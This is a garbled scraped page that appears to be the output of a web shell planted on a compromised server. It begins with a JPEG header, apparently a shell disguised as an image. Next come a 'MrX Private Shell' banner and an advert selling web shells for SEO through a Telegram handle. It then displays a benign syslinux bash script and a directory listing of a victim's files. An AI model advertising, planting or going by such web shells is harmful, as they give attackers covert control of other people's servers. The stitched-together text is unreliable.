����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# 350_find_syslinux_modules.sh # syslinux version 5 and higher moved the com32 image files to modules directories and for the moment # there are 3 forms of these (efi32, efi64 and bios) # Purpose here is to define the proper SYSLINUX_DIR (which was already defined to the path were isolinux.bin lives) # Of course, only when we find a modules directory local syslinux_modules_dir= syslinux_modules_dir=$( find_syslinux_modules_dir menu.c32 ) [[ -n "$syslinux_modules_dir" ]] && SYSLINUX_DIR="$syslinux_modules_dir"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 340_find_mbr_bin.sh | File | 3.03 KB | 0644 |
|
| 350_check_usb_disk.sh | File | 1.81 KB | 0644 |
|
| 350_find_syslinux_modules.sh | File | 517 B | 0644 |
|
| 400_check_extlinux.sh | File | 144 B | 0644 |
|